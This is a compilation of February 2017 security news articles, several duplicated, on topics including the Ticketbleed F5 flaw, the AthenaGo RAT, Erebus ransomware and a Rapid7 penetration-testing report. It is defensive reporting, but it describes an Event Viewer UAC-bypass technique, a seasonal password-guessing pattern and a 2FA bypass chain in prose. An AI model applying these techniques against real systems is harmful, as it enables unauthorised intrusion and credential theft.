The list of affected F5 BIG-IP products includes LTM, AAM, AFM, Analytics, APM, ASM, GTM, Link Controller, PEM and PSM. Updates that address the flaw have been released for most of these products. As a workaround, users can disable the Session Tickets option on the affected Client SSL profile from the Configuration utility's Local Traffic > Profiles > SSL > Client menu.
“The vulnerability lies in the implementation of Session Tickets, a resumption technique used to speed up repeated connections. When a client supplies a Session ID together with a Session Ticket, the server is supposed to echo back the Session ID to signal acceptance of the ticket. Session IDs can be anywhere between 1 and 31 bytes in length,” Valsorda explained.
“The F5 stack always echoes back 32 bytes of memory, even if the Session ID was shorter. An attacker providing a 1-byte Session ID would then receive 31 bytes of uninitialized memory,” the expert added.
Valsorda has made available a simple online tool that allows users to determine if their server is vulnerable to Ticketbleed attacks. Internet scans conducted by the researcher showed that 949 of the Alexa top one million websites were vulnerable, including 15 in the top 10,000 sites. Of the top one million hosts on Cisco’s Umbrella cloud security platform, over 1,600 were found to be affected.
Valsorda has provided detailed technical information on the vulnerability and made some recommendations for security vendors that might consider trying to detect potential Ticketbleed attacks.
Government Contractor Indicted Over Theft of Secret Documents
9.2.2017 securityweek BigBrothers
Harold Thomas Martin III, the former U.S. government contractor arrested last year for theft of classified material, was indicted on Wednesday by a federal grand jury.
Martin, age 52, of Glen Burnie, Maryland, had worked as a security contractor for several government agencies between 1993 and 2016 through at least seven private companies. Similar to the whistleblower Edward Snowden, he worked at the National Security Agency (NSA) while employed by intelligence contractor Booz Allen Hamilton.
According to authorities, Martin held Top Secret and Sensitive Compartmented Information (SCI) clearances, which provided him access to classified government computer systems, programs and information.
The indictment alleges that Martin stole vast amounts of classified material between 1996 and August 2016, when he was arrested. The files, including ones containing information that could cause serious damage to national security, were found in his home and car.
Investigators said the man had stolen 50 terabytes of files, including secret, top-secret and SCI documents related to the NSA, the Cyber Command (USCYBERCOM), the National Reconnaissance Office (NRO), and the Central Intelligence Agency (CIA).
“The indictment alleges that Martin knew that the stolen documents contained classified information that related to the national defense and that he was never authorized to retain these documents at his residence or in his vehicle,” said the Justice Department.
Martin has been indicted on 20 counts of willful retention of national defense information and he faces up to 10 years in prison for each count.
While the suspect’s attorneys have not made any comments recently, The Washington Post reported that they had previously claimed Martin was taking documents home in an effort to become better in his job and he did not intend to provide any information to foreign governments.
At one point, some reports linked Martin to Shadow Brokers, the group that offered to sell exploits and tools allegedly stolen from the NSA-linked cyber espionage team known as the Equation Group.
AthenaGo RAT Uses Tor2Web for C&C Communication
9.2.2017 securityweek Virus
A newly observed Remote Access Trojan (RAT) targeting Windows systems is using Tor2Web proxies for communication with the command and control (C&C) server, Cisco Talos security researchers warn.
The RAT was written in Go, which is rather unusual for Windows malware, and its author refers to it as Athena, which determined the security researchers to call it AthenaGo. The Trojan, Cisco Talos threat researcher Edmund Brumaghin explains, can download and run additional binaries on the infected system, besides relying on Tor2Web proxies for communication purposes.
The malware is distributed via macro-enabled Word documents, an incresingly popular delivery method that was recently used to drop macOS malware as well. The malicious documents distributing AthenaGo appear to be targeting Portuguese speaking users, as the message that instructs potential victims to enable macros was written in Portuguese.
AthenaGo, one of the few Windows malware families to have been written in Go, comes with two hardcoded domains that it connects to post-infection. Both utilize Tor2Web, a project that allows access to resources on the Tor (The Onion Router) network even if the requesting client system isn’t part of the network.
“Tor2Web servers act as proxies and allow clients to access servers hosting content on Tor without requiring the installation of a local Tor client application. This approach has shown to be increasingly attractive to cybercriminals. The use of Tor2Web and Tor in general allows them to stay anonymous. It also makes it much more difficult to remove malicious content being hosted on servers within Tor, as it is difficult to identify where a Tor server is hosted physically,” the security researcher explains.
During the initial infection process, AthenaGo generates public and private RSA keys that are used to communicate with the C&C server, after which it makes two HTTP HEAD requests to the two hardcoded servers.
The malware includes support for various commands that it executes when receiving instructions from the C&C server: ListDir (for a list of directories on the infected system), ListProcesses (generates a list of processes), KillProcess (to execute the taskkill command against a target process), DownloadFile (to download and save a file), DLRUN (to download a file, save it to %TEMP% and execute it), and RunCMD (to execute system commands on the infected system using Go's os/exec package)
“Malware authors will continue to evolve their attacks as they identify ways to effectively reduce their risk of being caught. This includes relying on C&C infrastructure hosted on Tor, making use of varying levels of encryption to protect the nature and content of network communications with their malware, and limiting their attacks to targeted attacks against specific targets or demographics. AthenaGo is an example of changes in the way malware is being written in an attempt to evade network defenses and successfully compromise target environments,” Cisco Talos’ researcher concludes.
Firms Increasingly Interested in Cyber Insurance: Study
9.2.2017 securityweek Cyber
Companies in the United States, the United Kingdom and Germany are increasingly interested in taking out cyber insurance, according to a new study commissioned by insurance provider Hiscox.
The cyber security readiness study, which involved 3,000 businesses from the three countries, shows that 30% of companies in Germany, 36% in the U.K. and 55% in the U.S. already have cyber insurance. Roughly 30% of the firms that don’t have insurance plan on getting insured in the next 12 months.
The top reasons for taking out cyber insurance are related to the cost of a potential breach and the need for peace of mind, data security concerns, the possibility of customer action, and new data regulations. In roughly one-quarter of cases, cyber insurance is a legal requirement.
More than half of the respondents reported being hit by at least one cyberattack in the last 12 months and the cost of dealing with an incident has been significant. On average, companies in the United States with over 1,000 employees said the largest cyber incident had cost them more than $100,000.
In the case of small U.S. firms, with less than 100 employees, the average cost was roughly $35,000. In the U.K. and Germany, organizations reported spending between approximately $32,000 and $67,000, respectively between $24,000 and $48,000, depending on their size.
The study shows that larger organizations are more likely to be interested in cyber insurance, and financial services is the most insurance-aware sector, with more than half of respondents already having cyber insurance.
Experts pointed out that Germany has been increasingly interested in cyber insurance since the attack on its parliament in 2015. Organizations in Europe are also looking for cyber insurance as a result of the EU’s new data protection regulations, which will take effect in 2018.
Of the companies that do not intend to get cyber insurance, many said the insurance policies are too complicated, they are not exactly sure what cyber insurance is, or they don’t trust the insurer to pay out in the event of an incident.
According to a report published by Allied Market Research (AMR) in December, the global cyber insurance market is expected to generate $14 billion by 2022, which represents a 28 percent increase from 2016.
In the meantime, some security companies have started providing alternatives to the traditional insurance services. San Francisco-based security consulting firm AsTech announced this week that it will be offering a $1 million warranty against breach-related costs if a customer is hacked as a result of a vulnerability that AsTech fails to discover. Endpoint security firm SentinelOne offered similar guarantees last year.
U.S. Queries PayPal in Money Laundering Probe
9.2.2017 securityweek IT
San Francisco - US authorities have demanded information from online payment service PayPal as part of a money laundering investigation, according to a regulatory filing available on Wednesday.
"We have received subpoenas from the US Department of Justice seeking the production of certain information related to our historical anti-money laundering program," Silicon Valley-based PayPal said in an annual report to the US Securities and Exchange Commission.
PayPal noted that it was cooperating with authorities and did not speculate on the outcome of the investigation. No further details were provided.
The news appeared to weigh slightly on PayPal shares, which were down more than 1.5 percent to $40.24 in after-market trades on the Nasdaq.
"Ticketbleed" Flaw Exposes F5 Appliances to Remote Attacks
9.2.2017 securityweek Attack
F5 Networks BIG-IP appliances are affected by a serious vulnerability that can be exploited by a remote attacker to extract memory. An Internet scan showed that hundreds of hosts had been exposed by the flaw.
The vulnerability, dubbed “Ticketbleed” and tracked as CVE-2016-9244, was discovered by Filippo Valsorda, cryptography engineer at CloudFlare, and other employees of the content delivery network (CDN). The expert identified the weakness while investigating a bug report from a CloudFlare customer, and notified F5 in late October.
According to F5, the vulnerability affects BIG-IP SSL virtual servers that have the non-default Session Tickets option enabled. The leaked memory can contain SSL session IDs and other potentially sensitive data.Ticketbleed vulnerability
As its name suggests, Ticketbleed is somewhat similar to the notorious OpenSSL vulnerability known as Heartbleed. However, unlike Heartbleed, Ticketbleed exposes 31 bytes of memory at a time instead of 64 kilobyte chunks – which means an attack requires more rounds – and it’s specific to F5 products.
The list of affected F5 BIG-IP products includes LTM, AAM, AFM, Analytics, APM, ASM, GTM, Link Controller, PEM and PSM. Updates that address the flaw have been released for most of these products. As a workaround, users can disable the Session Tickets option on the affected Client SSL profile from the Configuration utility's Local Traffic > Profiles > SSL > Client menu.
“The vulnerability lies in the implementation of Session Tickets, a resumption technique used to speed up repeated connections. When a client supplies a Session ID together with a Session Ticket, the server is supposed to echo back the Session ID to signal acceptance of the ticket. Session IDs can be anywhere between 1 and 31 bytes in length,” Valsorda explained.
“The F5 stack always echoes back 32 bytes of memory, even if the Session ID was shorter. An attacker providing a 1-byte Session ID would then receive 31 bytes of uninitialized memory,” the expert added.
Valsorda has made available a simple online tool that allows users to determine if their server is vulnerable to Ticketbleed attacks. Internet scans conducted by the researcher showed that 949 of the Alexa top one million websites were vulnerable, including 15 in the top 10,000 sites. Of the top one million hosts on Cisco’s Umbrella cloud security platform, over 1,600 were found to be affected.
Valsorda has provided detailed technical information on the vulnerability and made some recommendations for security vendors that might consider trying to detect potential Ticketbleed attacks.
Government Contractor Indicted Over Theft of Secret Documents
9.2.2017 securityweek Incindent
Harold Thomas Martin III, the former U.S. government contractor arrested last year for theft of classified material, was indicted on Wednesday by a federal grand jury.
Martin, age 52, of Glen Burnie, Maryland, had worked as a security contractor for several government agencies between 1993 and 2016 through at least seven private companies. Similar to the whistleblower Edward Snowden, he worked at the National Security Agency (NSA) while employed by intelligence contractor Booz Allen Hamilton.
According to authorities, Martin held Top Secret and Sensitive Compartmented Information (SCI) clearances, which provided him access to classified government computer systems, programs and information.
The indictment alleges that Martin stole vast amounts of classified material between 1996 and August 2016, when he was arrested. The files, including ones containing information that could cause serious damage to national security, were found in his home and car.
Investigators said the man had stolen 50 terabytes of files, including secret, top-secret and SCI documents related to the NSA, the Cyber Command (USCYBERCOM), the National Reconnaissance Office (NRO), and the Central Intelligence Agency (CIA).
“The indictment alleges that Martin knew that the stolen documents contained classified information that related to the national defense and that he was never authorized to retain these documents at his residence or in his vehicle,” said the Justice Department.
Martin has been indicted on 20 counts of willful retention of national defense information and he faces up to 10 years in prison for each count.
While the suspect’s attorneys have not made any comments recently, The Washington Post reported that they had previously claimed Martin was taking documents home in an effort to become better in his job and he did not intend to provide any information to foreign governments.
At one point, some reports linked Martin to Shadow Brokers, the group that offered to sell exploits and tools allegedly stolen from the NSA-linked cyber espionage team known as the Equation Group.
AthenaGo RAT Uses Tor2Web for C&C Communication
9.2.2017 securityweek Virus
A newly observed Remote Access Trojan (RAT) targeting Windows systems is using Tor2Web proxies for communication with the command and control (C&C) server, Cisco Talos security researchers warn.
The RAT was written in Go, which is rather unusual for Windows malware, and its author refers to it as Athena, which determined the security researchers to call it AthenaGo. The Trojan, Cisco Talos threat researcher Edmund Brumaghin explains, can download and run additional binaries on the infected system, besides relying on Tor2Web proxies for communication purposes.
The malware is distributed via macro-enabled Word documents, an incresingly popular delivery method that was recently used to drop macOS malware as well. The malicious documents distributing AthenaGo appear to be targeting Portuguese speaking users, as the message that instructs potential victims to enable macros was written in Portuguese.
AthenaGo, one of the few Windows malware families to have been written in Go, comes with two hardcoded domains that it connects to post-infection. Both utilize Tor2Web, a project that allows access to resources on the Tor (The Onion Router) network even if the requesting client system isn’t part of the network.
“Tor2Web servers act as proxies and allow clients to access servers hosting content on Tor without requiring the installation of a local Tor client application. This approach has shown to be increasingly attractive to cybercriminals. The use of Tor2Web and Tor in general allows them to stay anonymous. It also makes it much more difficult to remove malicious content being hosted on servers within Tor, as it is difficult to identify where a Tor server is hosted physically,” the security researcher explains.
During the initial infection process, AthenaGo generates public and private RSA keys that are used to communicate with the C&C server, after which it makes two HTTP HEAD requests to the two hardcoded servers.
The malware includes support for various commands that it executes when receiving instructions from the C&C server: ListDir (for a list of directories on the infected system), ListProcesses (generates a list of processes), KillProcess (to execute the taskkill command against a target process), DownloadFile (to download and save a file), DLRUN (to download a file, save it to %TEMP% and execute it), and RunCMD (to execute system commands on the infected system using Go's os/exec package)
“Malware authors will continue to evolve their attacks as they identify ways to effectively reduce their risk of being caught. This includes relying on C&C infrastructure hosted on Tor, making use of varying levels of encryption to protect the nature and content of network communications with their malware, and limiting their attacks to targeted attacks against specific targets or demographics. AthenaGo is an example of changes in the way malware is being written in an attempt to evade network defenses and successfully compromise target environments,” Cisco Talos’ researcher concludes.
Firms Increasingly Interested in Cyber Insurance: Study
9.2.2017 securityweek Cyber
Companies in the United States, the United Kingdom and Germany are increasingly interested in taking out cyber insurance, according to a new study commissioned by insurance provider Hiscox.
The cyber security readiness study, which involved 3,000 businesses from the three countries, shows that 30% of companies in Germany, 36% in the U.K. and 55% in the U.S. already have cyber insurance. Roughly 30% of the firms that don’t have insurance plan on getting insured in the next 12 months.
The top reasons for taking out cyber insurance are related to the cost of a potential breach and the need for peace of mind, data security concerns, the possibility of customer action, and new data regulations. In roughly one-quarter of cases, cyber insurance is a legal requirement.
Reasons for taking out cyber insurance
More than half of the respondents reported being hit by at least one cyberattack in the last 12 months and the cost of dealing with an incident has been significant. On average, companies in the United States with over 1,000 employees said the largest cyber incident had cost them more than $100,000.
In the case of small U.S. firms, with less than 100 employees, the average cost was roughly $35,000. In the U.K. and Germany, organizations reported spending between approximately $32,000 and $67,000, respectively between $24,000 and $48,000, depending on their size.
The study shows that larger organizations are more likely to be interested in cyber insurance, and financial services is the most insurance-aware sector, with more than half of respondents already having cyber insurance.
Experts pointed out that Germany has been increasingly interested in cyber insurance since the attack on its parliament in 2015. Organizations in Europe are also looking for cyber insurance as a result of the EU’s new data protection regulations, which will take effect in 2018.
Of the companies that do not intend to get cyber insurance, many said the insurance policies are too complicated, they are not exactly sure what cyber insurance is, or they don’t trust the insurer to pay out in the event of an incident.
According to a report published by Allied Market Research (AMR) in December, the global cyber insurance market is expected to generate $14 billion by 2022, which represents a 28 percent increase from 2016.
In the meantime, some security companies have started providing alternatives to the traditional insurance services. San Francisco-based security consulting firm AsTech announced this week that it will be offering a $1 million warranty against breach-related costs if a customer is hacked as a result of a vulnerability that AsTech fails to discover. Endpoint security firm SentinelOne offered similar guarantees last year.
HackerOne Penetrates VC Pockets for $40 Million
9.2.2017 securityweek Security
Bug bounty platform provider HackerOne announced on Wednesday that it has raised $40 million in a Series C financing round led by Dragoneer Investment Group.
The San Francisco-based startup offers a software-as-a-service platform that provides the technology and automation to help organizations run their own vulnerability management and bug bounty programs.
The company says the new funds will be used to invest in technology development, expand market reach, and strengthen its hacker community of more than 100,000 white hat hackers.
HackerOne Logo
The company was co-founded by Alex Rice, the company’s CTO and the man behind Facebook’s bug bounty program, Merijn Terheggen, who serves as CEO, Jobert Abma (tech lead) and Michiel Prins (product lead). HackerOne gained publicity in November 2013 when it announced hosting the Internet Bug Bounty project funded by Microsoft and Facebook.
According to the security startup, more than 38,000 security vulnerabilities have been resolved across more than 700 HackerOne customers, with more than $14 million in bug bounties awarded to date, $7 million of which was awarded in 2016.
In 2016, the U.S. Department of Defense (DoD) selected HackerOne to run the U.S. federal government's first bug bounty challenge, Hack the Pentagon, which HackerOne says resolved more than 138 vulnerabilities discovered by 1,400 hackers.
In October 2016 the DoD announced that it awarded a combined $7 million to HackerOne and Synack for helping the organization’s components launch their own bug bounty initiatives. With $3 million awarded to HackerOne, the company will help the DoD run challenges similar to Hack the Pentagon, while Synack will provide assistance for a private program open only to highly vetted researchers, the DoD said, adding that the private program will focus on the Pentagon’s sensitive IT assets.
Other HackerOne customers include Airbnb, CloudFlare, General Motors, GitHub, New Relic, Nintendo, Qualcomm, Starbucks, Uber and Lufthansa.
“Our customers typically receive their first valid security vulnerability report the same day they challenge our diverse community of hackers to examine their code,” said Marten Mickos, CEO of HackerOne. “There’s no such thing as perfect software and bug bounty programs are the most efficient and cost-effective solution for finding security vulnerabilities in live software.”
NEA, Benchmark and Strategic Investors also participated in the Series C round.
Rockwell Automation Teams With Claroty on Industrial Network Security
9.2.2017 securityweek Security
Rockwell Automation this week announced that it teaming up with industrial cybersecurity startup Claroty to combine their security products and services into future, combined security offerings.
Rockwell, an industrial automation giant with more than 22,000 employees, said that after a competitive review process it selected Claroty for its anomaly-detection software purpose built for industrial network security.
Armed with $32 million in funding through Series A and a Series B rounds, Claroty exited stealth mode in September 2016 to announce a security platform designed to provide “extreme visibility” into Operational Technology (OT) environments and protect critical infrastructure from cyber threats.
Claroty has built a platform that provides broad support for control system manufacturers and employs “high-fidelity models and advanced algorithms” to monitor industrial control systems (ICS) communications and provide security and process integrity alerts. The platform can inspect a large number of industrial control protocols; with support for both open and proprietary protocols from vendors including Siemens, Rockwell Automation/Allen Bradley, Yokogawa, Emerson, GE, Schneider Electric, Mitsubishi, Honeywell, ABB and more.
“More connected control systems combined with the potential for more attacks on those systems have made cybersecurity a top concern in the industrial world,” said Scott Lapcewich, vice president and general manager, Customer Support and Maintenance, Rockwell Automation. “Claroty’s deep-visibility software platform and expertise in industrial security made the company a natural fit for substantial collaboration as we grow our existing portfolio of security service and support offerings.”
“The Claroty platform can detect a bad actor’s activities at any stage, whether they’re trying to gain a foothold on a network, conduct reconnaissance or inflict damage,” said Amir Zilberstein, co-founder and CEO, Claroty. “It also can detect human errors and other process integrity issues, which are often more common than threats from bad-actors. For example, the software monitors for critical asset changes that, if done incorrectly, could result in unexpected downtime. The system also identifies network-configuration issues that could expose a system to outside threats.”
Erebus Ransomware Bypasses UAC for Privilege Elevation
9.2.2017 securityweek Virus
A newly observed ransomware variant is using a technique to bypass User Account Control (UAC) in order to elevate its privileges without displaying a UAC prompt, researchers have discovered.
Dubbed Erebus, the malware appears to be new, though it features the same name as a piece of ransomware that emerged in late September 2016. However, the different characteristics of the two malicious apps suggest that the newly discovered variant is either a completely different malware or a fully rewritten release, BleepingComputer’s Lawrence Abrams notes.
Details on Erebus’ distribution mechanism aren’t available at the moment. What is known, however, is that the malware leverages a UAC bypass technique that was detailed in August last year and which abuses Event Viewer to infect the compromised systems without alerting the user.
For that, the ransomware copies itself to a random named file in the same folder, after which it modifies the Windows registry to hijack the association for the .msc file extension and set it to launch the randomly named Erebus file instead.
Next, the ransomware executes eventvwr.exe (Event Viewer), which will automatically open the eventvwr.msc file, which will attempt to execute mmc.exe. Because the .msc file is no longer associated with mmc.exe, however, the randomly named Erebus executable is launched instead. Moreover, because Event Viewer runs in an elevated mode, the executable will run with the same privileges, which allows it to bypass UAC.
When executed, the malware connects to two different domains to determine the victim’s IP address and the country that they are located in. Next, the malware downloads a TOR client and uses it to connect to its command and control (C&C) server.
The ransomware then proceeds to scan the victim's computer and search for certain file types to encrypt using AES encryption. At the moment, the malware targets around 60 file types, including images and documents. Erebus encrypts the file’s extension using ROT-23, the researcher says.
During encryption, the ransomware also clears the Windows Volume Shadow Copies, in an attempt to prevent users from restoring their files this way. As soon as the encryption process has been completed, the malware drops a ransom note on the Desktop under the name of README.HTML, and then displays it. Additionally, Erebus displays a message box on the desktop, alerting the victim that their files have been encrypted.
The ransom note contains the user’s unique ID, a list of encrypted files, and a button that takes the victim to the TOR payment site. On that site, users are provided with payment instructions. The requested ransom amount is .085 Bitcoin, or around $90 at the moment, which is one of the lowest when compared to other ransomware families out there.
Forcepoint Acquires Skyfence from Imperva
9.2.2017 securityweek Cyber
Forcepoint, the cybersecurity firm created from the $1.9 billion combination of Raytheon and Websense, today announced that it has agreed to acquire the Skyfence business from Imperva.
Skyfence is a player in the hot cloud access security broker (CASB) market, and provides visibility and control over cloud applications such as NetSuite, Office 365, Salesforce, Workday, Dropbox, G Suite and Box.
SKyfence was originally acquired by Imperva in February 2014.
The acquisition by Forcepoint, which is expected to be complete during the first quarter of 2017, will allow Forcepoint to integrate its web security and data loss prevention (DLP) technologies with Skyfence’s technology to provide customers increased visibility, control and security over cloud applications.
The integration also provides Forcepoint customers greater flexibility in deploying web security via on-premise, hybrid and cloud-based solutions, Forcepoint said.
CASBs, which provide security and visibility for companies moving to the cloud, have experienced rapid growth, with several players in the space being acquired by larger enterprise technology firms.
In June 2016, Cisco announced its intention to acquire CloudLock, a privately held cloud CASB based in Waltham, Massachusetts for $293 million in cash and assumed equity awards. In 2015, Microsoft bought Adallom and turned it into its Cloud App Security service launched in April 2016. In 2014 Imperva bought Skyfence; in 2015, Palo Alto Networks bought CirroSecure; and in November 2015 Blue Coat (since acquired by Symantec) bought Elastica.
Forcepoint previously entered into a licensing arrangement Skyfence in March 2015 that enabled Skyfence’s Cloud App Catalog to be integrated into Forcepoint’s web security gateway products.
Skyfence employees will join the Forcepoint team, with the main Skyfence team remaining to be based in Ramat Gan, Israel, the company said.
První středoškolská soutěž ČR v kybernetické bezpečnosti
9.2.2017 SecurityWorld IT
První kolo Středoškolské soutěže ČR v kybernetické bezpečnosti organizované Pracovní skupinou kybernetické bezpečnosti AFCEA a celou řadou státních, akademických a profesní organizací skončilo úspěšně.
Prvního kola se zúčastnilo téměř 1100 osob. Všechna kritéria soutěže splnilo 874 studentů ze 162 středních škol z celé ČR, kteří byli hodnoceni. Do druhého kola soutěže postupuje 567 soutěžících ze všech krajů ČR. Nejvíce zástupců bude mít kraj Jihomoravský, Praha a kraj Vysočina.
První „osvětové“ kolo soutěže ukázalo dobrou všeobecnou znalost studentů v oblasti kybernetické bezpečnosti. Šest studentů získalo plný počet bodů (40) a průměrný bodový výsledek 19,05 bodu všech hodnocených studentů představuje slušný výsledek a zcela jistě velkou motivaci pro následující kolo.
Do soutěže se zapojili studenti z různých typů škol a to nejen technických a gymnázií, ale i studenti z typicky netechnických škol a studijních oborů - např. z uměleckých průmyslovek, zdravotnických škol, hotelových škol atd. Některé školy „vyslaly“ do soutěže jen jednotlivce, jiné celé skupiny o několika desítkách účastníků. Nejvíce studentů v soutěži reprezentovalo Střední školu informatiky, poštovnictví a finančnictví Brno.
Je obtížné hodnotit nejúspěšnější školy, jelikož proměnných je mnoho - počet vyslaných studentů s jejich nejlepším, průměrným a nejhorším výsledkem, počtem postupujících studentů apod., a jsou jimi částečně znevýhodněny školy, které měli menší počet zapojených studentů. Přesto Soutěžní výbor takovéto hodnocení provedl a mezi pěti nejúspěšnějšími školami v České republice se umístili tyto:
Střední průmyslová škola elektrotechnická a Vyšší odborná škola, Pardubice;
Střední průmyslová škola na Proseku, Praha;
Církevní Gymnázium Německého Řádu, Olomouc;
Integrovaná střední škola technická a ekonomická, Sokolov;
SŠ AGC a.s., Teplice.
Součástí hodnocení prvního kola byla i realizace individuálních návštěv jednotlivých škol, osobní předávání diplomů a diskuse se studenty na téma kybernetické bezpečnosti. Členové soutěžního výboru v období od 10. ledna do 3. února uspořádali návštěvu 31 škol, na kterých proběhlo 29 diskusí a přednášek pro více než 1.200 studentů a pedagogů.
První kolo bylo hodnoceno po jednotlivých krajích, a tudíž mělo 14 skupin výherců. Detailní výsledková listina je zveřejněna na stránkách soutěže – www.kybersoutez.cz. Studenti a studentky postupující do druhého kola získali v rámci předaných cen a doprovodných materiálů přístup k celé řadě studijních podkladů o kybernetické bezpečnosti, které do soutěže věnovala řada odborných partnerů.
Důkladnější příprava na druhé kolo, které proběhne v březnu tohoto roku, bude nezbytná, jelikož toto kolo již bude náročnější, více technické a z části v anglickém jazyce. Soutěžící v něm budou usilovat o postup do celorepublikového finále, které proběhne za osobní účasti všech finalistů a jejich doprovodu 1. června 2017 v Brně v rámci mezinárodního veletrhu obranných a bezpečnostních technologií IDET 2017.
HTTPS Security Weakened by AV Products, Middleboxes: Study
8.2.2017 Securityweek Analysis
An increasing number of antiviruses and network appliances intercept TLS connections to gain visibility into encrypted traffic, but in many cases this weakens connection security and introduces vulnerabilities, according to a new study.
The study, focusing on the security impact of HTTPS interception, was carried out last summer by researchers at Mozilla, Google, CloudFlare, the University of Michigan, the University of Illinois Urbana-Champaign, the University of California Berkeley, and the International Computer Science Institute.
Experts have analyzed the TLS handshakes associated with web browsers, security products and malware, and created a set of heuristics designed to allow web servers to detect HTTPS interception and identify the product responsible.
Tests were conducted by deploying these heuristics on Mozilla’s Firefox update servers, the CloudFlare content distribution network (CDN), and some major e-commerce websites. The analysis showed that 4% of the Firefox connections, 6.2% of the e-commerce connections, and nearly 11% of US-based CloudFlare connections were intercepted.
Worryingly, 97% of the Firefox, 54% of the CloudFlare and 32% of the e-commerce connections that were intercepted became less secure. More than 62% of the middlebox connections were weakened and over 58% had severe vulnerabilities.
“Alarmingly, not only did intercepted connections use weaker cryptographic algorithms, but 10–40% advertised support for known-broken ciphers that would allow an active man-in-the-middle attacker to later intercept, downgrade, and decrypt the connection,” researchers said in their report.
The list of middlebox vendors whose products were tested includes A10 Networks, Blue Coat, Barracuda, Check Point, Cisco, Forcepoint, Fortinet, Juniper Networks, Microsoft, Sophos, Untangle and WebTitan. Only the Blue Coat product received an A grade (optimal TLS connection equivalent to modern browsers), while the others received a C (contains known vulnerability) or F (severely broken connection vulnerable to MitM attacks).
The antiviruses analyzed in the study include Windows and Mac products from Avast, AVG, Bitdefender, Bullguard, CYBERsitter, Dr. Web, ESET, G DATA, Kaspersky, KinderGate, Net Nanny, PC Pandora and Qustodio. Only two of the tested Avast products received an A grade.
The researchers said they reported their findings to the affected vendors, and while some of them addressed the issues or they plan on doing so, others ignored them or refused to update their products and shifted responsibility to customers.
The study was published shortly after a member of the Chrome security team and a former Mozilla employee said the only antivirus that is not terrible is the one made by Microsoft.
Two-thirds of Enterprises Usually Breached by White Hat Hackers
8.2.2017 Securityweek Hacking
Analysis of 128 penetration tests conducted in the fourth quarter of 2016 shows that approximately two-thirds of tested companies were successfully breached. This is despite the limited time -- in 89% of cases, less than two weeks -- available to the pentesters compared to the effectively unlimited time available to blackhat attackers.
Rapid7, which was appointed a CVE numbering authority in December 2016, analyzed 128 of the engagements it undertook in the closing months of last year. These involved both internal testing and external testing. In most cases the client company was more interested in external testing (67.2%) over internal testing (21.1%). A few (8.6%) combined both internal and external tests, while a smaller number of tests (3.1%) were neither (code and IoT audits, for example).
External pentests involved testing web sites, phishing, VPNs and so on. Internal tests looked at, for example, network misconfigurations, software, and wifi. Although there were fewer internal tests, states Rapid7, "Overall, penetration testers successfully compromised the target organization through software vulnerabilities or network misconfigurations just over 80% of the time."
The good news, it added, is that "most of the techniques used can be defended against with sensible, widely understood and appropriately tailored network security best practices, including patch management, network segmentation, and regular assessments of the most likely sources of risk in the enterprise."
Pentesters are usually asked to evaluate protection in specific areas. Unsurprisingly, given the increasing scope of regulations, the most frequent request (57% of the companies tested) is to test against the theft of personally identifiable information (PII). This is followed by sensitive internal data at 55.5%. And yet, "despite the recent uptick in online industrial espionage, the surveyed organizations seemed the least interested in specifically protecting copyrighted material [2.3%], digital certificates [3.1%], source code [9.4%], or trade secrets [13.1%]."
It is tempting to infer from this that compliance pressures are focusing defense of PII over purely business secrets. Indeed, Rapid7 director of research, Tod Beardsley, told SecurityWeek, "It was surprising that companies are focusing so much attention on protecting PII, given that real criminals have such a variety of goals, including an increased interest in industrial espionage. We do think that this is due to compliance requirements that mandate PII protections, and therefore, organizations are dedicating their limited resources to making sure their PII story is solid. This is certainly rational, but we worry that organizations are growing too focused on PII protections while criminals are expanding their areas of interest."
The report highlights the value of protecting credentials. "The number one method of obtaining account access," it states, "starts with very simple password guessing; enforcing more machine-generated, rather than human-generated, passwords would go a long way toward defending against this threat, as would more widespread adoption of two-factor authentication."
Rapid7 outlines the methods it uses to 'acquire' client credentials. The most common, and the most successful, is manual guesswork. "Here's a time-saving tip," it comments: "If you know a lot of, or all, usernames, just try <Current season><current year>. People love that password, and according to our survey data, manually guessing patterns like this is successful a surprising (depressing?) fraction of the time."
The two most common methods of defending credentials are account lock-outs and two-factor authentication. However, 32.8% of enterprises did not use lockouts, while for another 42.2% the lockout had no effect or simply delayed the compromise. Rapid7 points out that 14% of the surveyed sites also lacked detection controls. "Combined with a lack of effective lockouts, this is a prescription for inevitable compromise."
2FA authentication is a more successful method of protecting credentials; but is surprisingly rare. "2FA is generally effective in preventing the most common forms of credential compromise, especially when combined with a reasonable detection control like user behavior analytics," says Rapid7.
Once an account is compromised, both pentesters and attackers will seek to locate and use more privileged credentials. Such a process is described in one of several case studies outlined in the report. This client was a technology company. Rapid7 detailed "how good information gathering, coupled with precise password sprays, can ultimately result in going from an unauthenticated nobody on the internet, to an authenticated user on the Domain, and ultimately to a Domain Administrator."
The first step was to search the internet for names or usernames and the potential username format. "This username enumeration technique produced several valid accounts in the domain, which were then re-ran through a brute-force attack against the OWA installation using that favorite password of pen testers, <CurrentSeason><CurrentYear>. This attack produced several valid credentials pairs."
2FA was in use, connected to a VPN endpoint; but Rapid7 by-passed it by changing a compromised e-mail account to one controlled by Rapid7 and using the VPN's self-service enrollment feature. This got the pentesters into the system, and they then scanned the internal hosts until they found an old Group Policy Preference file containing service account credentials vulnerable to trivial decryption. "This user was a Domain Administrator on the network," reports Rapid7, "and therefore Rapid7 had fully compromised this domain upon connecting to the domain controller with this account."
Rapid7 is concerned at the consistency with which it can compromise its clients. There seems to be no difference between small companies with a small attack surface, and large enterprises with a large attack surface. "Over two-thirds of [our] penetration testers remain undetected," it concludes. "Beyond network segmentation, patch management, or any other technical countermeasure, a routine malicious behavior detection strategy that is at least able to catch these frenetic bursts of malicious activity is the best technical protection solution money can buy today."
Macro Malware Comes to macOS
8.2.2017 Securityweek Virus
After becoming a common occurrence on Windows-based computers over the past few years, Malware that abuses macro-enabled Microsoft Office documents to spread is now targeting macOS users too.
Malicious macros in Office documents have been used to spread malware for over a decade, but their use dropped significantly after Microsoft disabled macros by default in Office 2007. A couple of years ago, however, the use of such macros recommenced, as cybercriminals started leveraging various social engineering techniques to trick users into enabling the macros.
Until now, only Windows users were targeted in such attacks, but it appears that actors building malware for Mac systems also decided to adopt the technique recently. According to Patrick Wardle, Director of Research at Synack, such an attack was recently carried out via a Word document named “U.S. Allies and Rivals Digest Trump’s Victory - Carnegie Endowment for International Peace.docm.”
By using clamAV's sigtool to extract embedded macros, the researcher stumbled upon Python code designed to perform a series of checks on the potential victim’s machine before it fetches and executes the malicious payload. As soon as the user opens the document in Word for Mac with macros enabled, the Fisher function is automatically executed.
